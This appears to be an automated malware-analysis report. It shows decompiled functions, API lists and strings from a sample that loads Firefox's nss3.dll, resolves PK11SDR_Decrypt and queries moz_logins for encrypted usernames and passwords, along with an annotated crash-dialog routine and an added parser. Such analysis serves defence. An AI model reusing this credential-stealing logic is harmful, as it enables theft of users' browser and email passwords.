                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                                                                                                                                                                  • memset.MSVCRT ref: 0040D430
                                                                                                                                                                  • memset.MSVCRT ref: 0040D449
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D954,000000FF,?,00000104,00000104,00000000,?,0040D954,?,00000000), ref: 0040D460
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D954,?,00000000), ref: 0040D47F
                                                                                                                                                                  • memset.MSVCRT ref: 0040D4F2
                                                                                                                                                                  • memset.MSVCRT ref: 0040D504
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D576
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D589
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D59F
                                                                                                                                                                  • strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5B5
                                                                                                                                                                  • strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5CB
                                                                                                                                                                  • strcpy.MSVCRT(?,0040D954,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5E1
                                                                                                                                                                  • memset.MSVCRT ref: 0040D5FC
                                                                                                                                                                  • memset.MSVCRT ref: 0040D610
                                                                                                                                                                  • memset.MSVCRT ref: 0040D676
                                                                                                                                                                  • memset.MSVCRT ref: 0040D68A
                                                                                                                                                                  • memset.MSVCRT ref: 0040D69E
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040D6B6
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040D6C8
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040D6DA
                                                                                                                                                                  • _stricmp.MSVCRT(?,?), ref: 0040D6F0
                                                                                                                                                                  • _stricmp.MSVCRT(?,?), ref: 0040D709
                                                                                                                                                                  • _stricmp.MSVCRT(?,?), ref: 0040D722
                                                                                                                                                                  • _stricmp.MSVCRT(?,00000204), ref: 0040D73B
                                                                                                                                                                  Strings
                                                                                                                                                                  • smtp://%s, xrefs: 0040D6D4
                                                                                                                                                                  • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040D4B5
                                                                                                                                                                  • mailbox://%s, xrefs: 0040D6B0
                                                                                                                                                                  • imap://%s, xrefs: 0040D6C2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$ByteCharCurrentDirectoryLibraryLoadMultiWidestrlen$HandleModule
                                                                                                                                                                  • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                  • API String ID: 2893247534-4245710904
                                                                                                                                                                  • Opcode ID: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                                                                                                                                                                  • Instruction ID: a8d77792ad7cee7e4ffb55223bde2ad9b6e4b2884a1795ffa9bad40f06226133
                                                                                                                                                                  • Opcode Fuzzy Hash: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                                                                                                                                                                  • Instruction Fuzzy Hash: FEC12D72D04119AEDB20DAA5DD859DEB7BCEF04314F1441BBF609F2191DA389E888B58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                  			E0040EB15(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
                                                                                                                                                                  				signed int _v0;
                                                                                                                                                                  				intOrPtr _v4;
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                  				struct HWND__* _v48;
                                                                                                                                                                  				struct HWND__* _v52;
                                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                                  				struct HDC__* _t169;
                                                                                                                                                                  				struct HWND__* _t171;
                                                                                                                                                                  				intOrPtr _t223;
                                                                                                                                                                  				void* _t224;
                                                                                                                                                                  				intOrPtr _t235;
                                                                                                                                                                  				struct HWND__* _t237;
                                                                                                                                                                  				void* _t240;
                                                                                                                                                                  				intOrPtr* _t274;
                                                                                                                                                                  				signed int _t275;
                                                                                                                                                                  				signed int _t276;
                                                                                                                                                                  
                                                                                                                                                                  				_t274 = __esi;
                                                                                                                                                                  				_t276 = _t275 & 0xfffffff8;
                                                                                                                                                                  				E00412360(0x2198, __ecx);
                                                                                                                                                                  				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
                                                                                                                                                                  				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
                                                                                                                                                                  				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
                                                                                                                                                                  				_a20 = GetWindowLongA(_t237, 0xfffffff0);
                                                                                                                                                                  				_a24 = GetWindowLongA(_a4, 0xfffffff0);
                                                                                                                                                                  				_a96 = GetWindowLongA(_t237, 0xffffffec);
                                                                                                                                                                  				_a36 = GetWindowLongA(_a4, 0xffffffec);
                                                                                                                                                                  				GetWindowRect(_t237,  &_a100);
                                                                                                                                                                  				GetWindowRect(_a4,  &_a60);
                                                                                                                                                                  				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
                                                                                                                                                                  				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
                                                                                                                                                                  				_t240 = _a108 - _a100.x;
                                                                                                                                                                  				_a4 = _a4 & 0x00000000;
                                                                                                                                                                  				_a28 = _a68 - _a60.x;
                                                                                                                                                                  				_a76 = _a112 - _a104;
                                                                                                                                                                  				_a40 = _a72 - _a64;
                                                                                                                                                                  				_t169 = GetDC( *(__esi + 4));
                                                                                                                                                                  				_a16 = _t169;
                                                                                                                                                                  				if(_t169 == 0) {
                                                                                                                                                                  					L9:
                                                                                                                                                                  					_v0 = _v0 & 0x00000000;
                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
                                                                                                                                                                  						L12:
                                                                                                                                                                  						_t171 = GetDlgItem( *(_t274 + 4), 1);
                                                                                                                                                                  						_a36 = _t171;
                                                                                                                                                                  						GetWindowRect(_t171,  &_a44);
                                                                                                                                                                  						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
                                                                                                                                                                  						GetClientRect( *(_t274 + 4),  &_a124);
                                                                                                                                                                  						GetWindowRect( *(_t274 + 4),  &_a80);
                                                                                                                                                                  						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                                                                                                                                  						GetClientRect( *(_t274 + 4),  &_a80);
                                                                                                                                                                  						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                                                                                                                                  					}
                                                                                                                                                                  					_a20 = _a20 | 0x10000000;
                                                                                                                                                                  					_a24 = _a24 | 0x10000000;
                                                                                                                                                                  					_a8 = _a12 + 0x10;
                                                                                                                                                                  					do {
                                                                                                                                                                  						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
                                                                                                                                                                  						_v20 = E0040150C(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
                                                                                                                                                                  						_v44 = E0040150C(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
                                                                                                                                                                  						sprintf( &_a80, "%s:", _v52->i);
                                                                                                                                                                  						_t276 = _t276 + 0xc;
                                                                                                                                                                  						SetWindowTextA(_v48,  &_a80);
                                                                                                                                                                  						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
                                                                                                                                                                  						_v60 = _v60 + 0x14;
                                                                                                                                                                  						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
                                                                                                                                                                  						_v68 = _v68 + 1;
                                                                                                                                                                  					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                                                                                                                  					goto L12;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t223 = 0;
                                                                                                                                                                  				_a32 = _a32 & 0;
                                                                                                                                                                  				_a8 = 0;
                                                                                                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
                                                                                                                                                                  					L8:
                                                                                                                                                                  					_t224 = _t223 - _t240;
                                                                                                                                                                  					_a28 = _a28 - _t224;
                                                                                                                                                                  					_a60.x = _a60.x + _t224;
                                                                                                                                                                  					_t240 = _t240 + _t224;
                                                                                                                                                                  					ReleaseDC( *(_t274 + 4), _a16);
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v0 = _a12 + 0x10;
                                                                                                                                                                  				do {
                                                                                                                                                                  					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
                                                                                                                                                                  						_t235 = _a100.x + 0xa;
                                                                                                                                                                  						if(_t235 > _v8) {
                                                                                                                                                                  							_v8 = _t235;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_a16 =  &(_a16->i);
                                                                                                                                                                  					_v16 = _v16 + 0x14;
                                                                                                                                                                  				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                                                                                                                  				_t223 = _v8;
                                                                                                                                                                  				goto L8;
                                                                                                                                                                  			}

Instruction address range of the listing above: 0x0040eb15 to 0x0040ee8a

Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
• String ID: %s:$EDIT$STATIC
• API String ID: 1703216249-3046471546
• Opcode ID: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
• Instruction ID: 954468ae603e5140b8f73852e098bd997e11b992376cfaf7be677857a6fc3954
• Opcode Fuzzy Hash: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
• Instruction Fuzzy Hash: AAB1EF71108341AFD710DF69C985E6BBBE9FF88704F008A2DF699922A0DB75E914CF16
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 88%
E0040E197(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
	/* Dialog procedure of the crash-report dialog: _a4 = hDlg, _a8 = uMsg, _a12 = wParam.
	   The saved exception context is read from globals 0x417c3c..0x417e7c
	   (EAX=0x417c50, EBX=0x417c44, ECX=0x417c4c, EDX=0x417c48, ESI=0x417c40,
	   EDI=0x417c3c, EBP=0x417c54, ESP=0x417c64, EIP=0x417c58, exception code=0x417e70,
	   fault address=0x417e7c), in the order they appear in the sprintf below. */
	char _v0;                  /* module name shown in the report, default "{Unknown}" */
	struct HWND__* _v4;
	void* __edi;
	void* _t44;
	void* _t58;
	int _t59;
	int _t61;
	int _t62;
	long _t66;
	struct HWND__* _t93;
	char* _t102;
	intOrPtr _t122;
	unsigned int _t125;
	signed int _t127;
	signed int _t128;
	void* _t134;

	_t128 = _t127 & 0xfffffff8;
	E00412360(0x1424, __ecx);  /* stack probe for the 0x1424-byte frame */
	_t44 = _a8 - 0x110;        /* 0x110 = WM_INITDIALOG */
	if(_t44 == 0) {
		E0040649B(__edx, _a4);
		 *_t128 = 0x7ff;
		_a3104 = 0;
		memset( &_a3105, 0, ??);
		asm("movsd");          /* 10-byte copy of the default name "{Unknown}" (xref 0040E259) into _v0 */
		asm("movsd");
		asm("movsw");
		memset( &_a10, 0, 0xfb);
		_a520 = 0;
		memset( &_a521, 0, 0xff);
		_a264 = 0;
		memset( &_a265, 0, 0xff);
		_a1056 = 0;
		memset( &_a1057, 0, 0x3ff);
		_a2080 = 0;
		memset( &_a2081, 0, 0x3ff);
		_t134 = _t128 + 0x48;
		_t58 = GetCurrentProcess();
		_t102 =  &_a520;
		_v4 = _t58;
		/* Reads 0x80 raw bytes at the faulting ESP from its own process (the "Stack Data" field). */
		_t59 = ReadProcessMemory(_t58,  *0x417c64,  &_a520, 0x80, 0);
		__eflags = _t59;
		if(_t59 != 0) {
			E004065B4( &_a1056,  &_a520, 4);   /* hex-format the buffer; third argument selects the grouping (4 here, 0 below) */
			_pop(_t102);
		}
		/* Reads 0x80 bytes at the faulting EIP (the "Code Data" field). */
		_t61 = ReadProcessMemory(_v4,  *0x417c58,  &_a264, 0x80, 0);
		__eflags = _t61;
		if(_t61 != 0) {
			E004065B4( &_a2080,  &_a264, 0);
			_pop(_t102);
		}
		_t62 = E004062A6();
		__eflags = _t62;
		if(_t62 == 0) {
			E0040E6C7();
		} else {
			E0040E74B();
		}
		__eflags =  *0x418514;
		if(__eflags != 0) {
			L17:
			/* Module lookup: E0040E8C6 appears to resolve the fault address in this process
			   to a 0x118-byte module record at 0x417ff0 and sets *0x418108 on success. */
			_a776 = 0;
			memset( &_a780, 0, 0x114);
			_t122 =  *0x417e7c; // 0x0
			_t134 = _t134 + 0xc;
			_t66 = GetCurrentProcessId();
			 *0x418108 = 0;
			E0040E8C6(_t102, __eflags, _t66, _t122);
			__eflags =  *0x418108;
			if( *0x418108 != 0) {
				memcpy( &_a776, 0x417ff0, 0x118);
				_t134 = _t134 + 0xc;
				__eflags =  *0x418108;
				if( *0x418108 != 0) {
					strcpy( &_v0, E004061F0( &_a784));   /* replaces "{Unknown}" with the resolved module name */
				}
			}
			goto L20;
		} else {
			__eflags =  *0x418518;
			if(__eflags == 0) {
				L20:
				/* Builds the report and writes it into edit control 0x3ea (1002) of the dialog. */
				sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x417e70,  *0x417e7c,  &_v0,  *0x417c50,  *0x417c44,  *0x417c4c,  *0x417c48,  *0x417c40,  *0x417c3c,  *0x417c54,  *0x417c64,  *0x417c58,  &_a1056,  &_a2080);
				SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
				SetFocus(GetDlgItem(_a4, 0x3ea));
				L21:
				return 0;
			}
			goto L17;
		}
	}
	if(_t44 == 1) {            /* 0x111 = WM_COMMAND */
		_t125 = _a12;
		if(_t125 >> 0x10 == 0) {   /* HIWORD(wParam) == 0: BN_CLICKED */
			if(_t125 == 3) {       /* LOWORD(wParam) == 3: the dialog's copy button */
				_t93 = GetDlgItem(_a4, 0x3ea);
				_v4 = _t93;
				SendMessageA(_t93, 0xb1, 0, 0xffff);   /* EM_SETSEL 0..-1: select the whole report */
				SendMessageA(_v4, 0x301, 0, 0);        /* WM_COPY: put it on the clipboard */
				SendMessageA(_v4, 0xb1, 0, 0);         /* EM_SETSEL 0..0: clear the selection */
			}
		}
	}
	goto L21;
}
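The report text this procedure builds (the format string at the sprintf call) ends up in edit control 0x3ea and, through the copy branch, on the clipboard, so during analysis it is often captured as plain text. The following parser turns such a dump back into structured fields. It is an added example, not code from the sample or from this sandbox report: the sample reports below are constructed, the values in them are made up, and the exact layout of the Stack Data and Code Data fields (produced by E004065B4) is assumed, so the parser keeps them as opaque hex strings. Exception-code names are the standard Windows NTSTATUS values.

```python
import re

# Constructed sample of what the dialog writes into control 0x3ea (made-up values).
SAMPLE_REPORT = (
    "Exception C0000005 at address 0040E3E7 in module C:\\Users\\user\\Desktop\\sample.exe\r\n"
    "Registers: \r\n"
    "EAX=00000000 EBX=00000001 ECX=0019FF20 EDX=00000002\r\n"
    "ESI=00418108 EDI=00417FF0 EBP=0019FF40 ESP=0019FE10\r\n"
    "EIP=0040E3E7\r\n"
    "Stack Data: 00000000 0019FF40 0040E197 0040E3E7\r\n"   # layout assumed
    "Code Data: 8B 45 08 50 FF 15 00 00 00 00\r\n"           # layout assumed
)

# Constructed sample for the path where the module lookup failed and the
# default name "{Unknown}" from the dialog's init code was kept.
SAMPLE_REPORT_UNKNOWN = (
    "Exception C000001D at address 7FFE0300 in module {Unknown}\r\n"
    "Registers: \r\n"
    "EAX=00000000 EBX=00000000 ECX=00000000 EDX=00000000\r\n"
    "ESI=00000000 EDI=00000000 EBP=0019FF40 ESP=0019FE10\r\n"
    "EIP=7FFE0300\r\n"
    "Stack Data: \r\n"
    "Code Data: \r\n"
)

# Standard NTSTATUS exception codes (subset).
EXCEPTION_NAMES = {
    0xC0000005: "EXCEPTION_ACCESS_VIOLATION",
    0xC000001D: "EXCEPTION_ILLEGAL_INSTRUCTION",
    0xC0000094: "EXCEPTION_INT_DIVIDE_BY_ZERO",
    0xC00000FD: "EXCEPTION_STACK_OVERFLOW",
    0x80000003: "EXCEPTION_BREAKPOINT",
    0x80000004: "EXCEPTION_SINGLE_STEP",
}

# First line of the sprintf format: "Exception %8.8X at address %8.8X in module %s"
HEADER_RE = re.compile(
    r"^Exception ([0-9A-Fa-f]{8}) at address ([0-9A-Fa-f]{8}) in module (.*)$"
)
# "EAX=%8.8X ..." register pairs, in whatever line they occur.
REG_RE = re.compile(r"\b(EAX|EBX|ECX|EDX|ESI|EDI|EBP|ESP|EIP)=([0-9A-Fa-f]{8})\b")


def parse_crash_report(text):
    """Parse the dialog's report text into a dict of typed fields."""
    lines = [ln.rstrip("\r") for ln in text.split("\n") if ln.strip()]
    m = HEADER_RE.match(lines[0]) if lines else None
    if not m:
        raise ValueError("text does not start with the dialog's 'Exception ...' header")
    code = int(m.group(1), 16)
    info = {
        "exception_code": code,
        "exception_name": EXCEPTION_NAMES.get(code, "UNKNOWN"),
        "address": int(m.group(2), 16),
        "module": m.group(3).strip(),
        "registers": {},
        "stack_data": "",   # kept as the raw hex string E004065B4 produced
        "code_data": "",
    }
    for ln in lines[1:]:
        if ln.startswith("Stack Data:"):
            info["stack_data"] = ln[len("Stack Data:"):].strip()
        elif ln.startswith("Code Data:"):
            info["code_data"] = ln[len("Code Data:"):].strip()
        else:
            for reg, val in REG_RE.findall(ln):
                info["registers"][reg] = int(val, 16)
    return info


def consistency_warnings(info):
    """Cheap sanity checks before quoting a parsed report in a triage note."""
    regs = info["registers"]
    warnings = []
    if "EIP" in regs and regs["EIP"] != info["address"]:
        warnings.append("EIP differs from the reported fault address")
    if "ESP" in regs and "EBP" in regs and regs["ESP"] > regs["EBP"]:
        warnings.append("ESP above EBP: no frame pointer set up, or report mangled")
    if info["module"] == "{Unknown}":
        warnings.append("fault address was not resolved to a module")
    return warnings


if __name__ == "__main__":
    for report in (SAMPLE_REPORT, SAMPLE_REPORT_UNKNOWN):
        parsed = parse_crash_report(report)
        print(parsed["exception_name"], hex(parsed["address"]), parsed["module"])
        for w in consistency_warnings(parsed):
            print("  warning:", w)
```

Because the dialog reads the faulting ESP and EIP through ReadProcessMemory on its own process, the Stack Data and Code Data fields are raw memory at the time of the fault; when the copy button is used, they leave the process via the clipboard, which is worth remembering when the same dialog fires inside a sample that has already injected into another process.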

APIs
Strings
• {Unknown}, xrefs: 0040E259
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040E460
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
• API String ID: 138940113-3474136107
• Opcode ID: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
• Instruction ID: c9ff55592ed190661b3986ab950919d3506bad0d2814ede43270e5be3f0f5ae2
• Opcode Fuzzy Hash: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
• Instruction Fuzzy Hash: 4571D672404244BFD721DF61DC45EDB7FEDEB48344F00883EF648921A1DA399A65CBAA
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
	E0040E54C(struct HINSTANCE__** __esi, intOrPtr _a4) {
		void _v267;
		char _v268;
		void _v531;
		char _v532;
		void* __ebx;
		void* __edi;
		int _t39;
		void* _t44;
		struct HINSTANCE__* _t53;
		struct HINSTANCE__* _t56;
		struct HINSTANCE__** _t69;

		_t69 = __esi;
		_v268 = 0;
		memset( &_v267, 0, 0x104);
		if(_a4 != 0) {
			E004060DA(0x104,  &_v268, _a4);
		}
		if(_v268 != 0) {
			GetCurrentDirectoryA(0x104,  &(_t69[8]));
			SetCurrentDirectoryA( &_v268);
			_v532 = 0;
			memset( &_v531, 0, 0x104);
			_t39 = strlen("nss3.dll");
			_t13 = strlen( &_v268) + 1; // 0x1
			if(_t39 + _t13 >= 0x104) {
				_v532 = 0;
			} else {
				E004062B7( &_v532,  &_v268, "nss3.dll");
			}
			_t44 = GetModuleHandleA( &_v532);
			 *_t69 = _t44;
			if(_t44 != 0) {
				L9:
				_t69[1] = GetProcAddress( *_t69, "NSS_Init");
				_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
				_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
				_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
				_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
				_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
				_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
			} else {
				_t53 = LoadLibraryExA( &_v532, _t44, 8);
				 *_t69 = _t53;
				if(_t53 != 0) {
					goto L9;
				} else {
					E0040E507();
					_t56 = LoadLibraryExA( &_v532, 0, 8);
					 *_t69 = _t56;
					if(_t56 != 0) {
						goto L9;
					}
				}
			}
		}
		return 0 |  *_t69 != 0x00000000;
	}

Code line addresses: 0x0040e54c 0x0040e566 0x0040e56d 0x0040e579 0x0040e584 0x0040e589 0x0040e591 0x0040e59c 0x0040e5a9 0x0040e5b9 0x0040e5c0 0x0040e5ca 0x0040e5dd 0x0040e5e6 0x0040e603 0x0040e5e8 0x0040e5fa 0x0040e600 0x0040e611 0x0040e619 0x0040e61b 0x0040e64d 0x0040e663 0x0040e66f 0x0040e67b 0x0040e687 0x0040e693 0x0040e69f 0x0040e6a4 0x0040e61d 0x0040e62d 0x0040e631 0x0040e633 0x00000000 0x0040e635 0x0040e635 0x0040e645 0x0040e649 0x0040e64b 0x00000000 0x00000000 0x0040e64b 0x0040e633 0x0040e61b 0x0040e6b1

APIs
• memset.MSVCRT ref: 0040E56D
• GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
• SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
• memset.MSVCRT ref: 0040E5C0
• strlen.MSVCRT ref: 0040E5CA
• strlen.MSVCRT ref: 0040E5D8
• GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
• LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
• LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
• GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
• GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
• GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
• GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
• GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
• GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
• GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E6A2
  • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
  • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
• String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
• API String ID: 1296682400-4029219660
• Opcode ID: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
• Instruction ID: ea12e4d39b815288b34f85ef975f35705c11e21fdcabb8b0f4231a79c1823d94
• Opcode Fuzzy Hash: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
• Instruction Fuzzy Hash: 7E4197B1940318AACB20DF75CC49FC6BBE8AF64704F154C6BE185A2180E7B9A6D4CF58
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E00401060(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                                                                  				struct tagPOINT _v12;
                                                                                                                                                                  				void _v267;
                                                                                                                                                                  				char _v268;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  				struct HBRUSH__* _t62;
                                                                                                                                                                  				void* _t67;
                                                                                                                                                                  				unsigned int _t68;
                                                                                                                                                                  				void* _t73;
                                                                                                                                                                  				struct HWND__* _t74;
                                                                                                                                                                  				struct HWND__* _t75;
                                                                                                                                                                  				void* _t78;
                                                                                                                                                                  				unsigned int _t79;
                                                                                                                                                                  				struct HWND__* _t81;
                                                                                                                                                                  				struct HWND__* _t82;
                                                                                                                                                                  				struct HWND__* _t83;
                                                                                                                                                                  				struct HWND__* _t84;
                                                                                                                                                                  				unsigned int _t89;
                                                                                                                                                                  				struct HWND__* _t91;
                                                                                                                                                                  				struct HWND__* _t93;
                                                                                                                                                                  				struct HWND__* _t94;
                                                                                                                                                                  				void* _t98;
                                                                                                                                                                  				void* _t104;
                                                                                                                                                                  				struct tagPOINT _t109;
                                                                                                                                                                  				struct tagPOINT _t111;
                                                                                                                                                                  
                                                                                                                                                                  				_t104 = __edx;
                                                                                                                                                                  				_t100 = __ecx;
                                                                                                                                                                  				_t50 = _a4 - 0x110;
                                                                                                                                                                  				_t98 = __ecx;
                                                                                                                                                                  				if(_t50 == 0) {
                                                                                                                                                                  					__eflags =  *0x418348;
                                                                                                                                                                  					if( *0x418348 != 0) {
